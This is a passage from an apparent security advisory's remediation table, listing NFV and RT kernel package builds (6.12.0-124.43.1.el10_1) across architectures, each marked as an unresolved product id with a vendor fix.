| Unresolved product id: NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
